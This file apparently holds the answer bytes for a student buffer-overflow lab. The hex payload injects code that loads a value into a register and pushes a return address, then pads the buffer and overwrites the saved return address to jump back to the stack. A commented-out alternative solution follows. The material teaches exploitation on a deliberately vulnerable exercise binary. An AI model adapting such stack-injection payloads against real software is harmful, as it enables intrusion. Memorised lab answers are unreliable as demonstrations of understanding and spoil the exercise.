48 c7 c7 fa 97 b9 59		/* store injected code starting from $rsp */
68 ec 17 40 00
c3
61 62 63 64 65 66 67 68 69
61 62 63 64 65 66 67 68 69
61 62 63 64 65 66 67 68 69
78 dc 61 55 00 00 00 00		/* ret to $rsp */

/* one of the other solutions */
/* 61 62 63 64 65 66 67 68 */
/* 48 c7 c7 fa 97 b9 59 */		/* store injected code starting from $rsp + 8 */
/* 68 ec 17 40 00 */
/* c3 */
/* 61 62 63 64 65 66 */
/* 61 62 63 64 65 66 */
/* 61 62 63 64 65 66 67 */
/* 80 dc 61 55 00 00 00 00	*/	/* jump to $rsp + 8 */
